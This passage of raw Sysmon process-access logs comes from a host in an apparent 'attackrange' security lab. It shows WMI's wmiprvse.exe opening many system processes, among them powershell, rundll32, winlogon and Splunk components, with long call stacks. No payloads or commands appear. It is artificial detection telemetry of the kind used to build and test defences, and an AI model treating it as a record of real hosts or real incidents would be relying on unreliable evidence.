mbase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204142Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.900{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D4F0-603F-B52D-00000000AD01}4336C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204141Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.900{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D4F0-603F-B42D-00000000AD01}2724C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204140Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.900{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-ADE1-603E-4F0A-00000000AD01}7004C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204139Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.900{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-9B0C-603E-D607-00000000AD01}6796C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204138Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.900{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-9A00-603E-9E07-00000000AD01}4168C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204137Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.900{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204136Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.900{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204135Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.900{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-99F4-603E-8607-00000000AD01}4560C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204134Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.900{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-99F4-603E-8307-00000000AD01}1624C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204133Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.900{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-99F2-603E-7D07-00000000AD01}636C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204132Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.900{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-99F1-603E-7A07-00000000AD01}2736C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204131Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.884{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-84BD-603E-DF00-00000000AD01}4964C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204130Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.884{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-84AF-603E-DC00-00000000AD01}3964C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204129Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.884{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204128Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.884{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-84A3-603E-A900-00000000AD01}4912C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204127Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.884{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204126Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.884{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-8444-603E-5B00-00000000AD01}3492C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204125Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.884{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-8444-603E-5800-00000000AD01}3304C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204124Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.884{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-8440-603E-3400-00000000AD01}2960C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204123Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.884{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-8440-603E-3300-00000000AD01}2668C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+665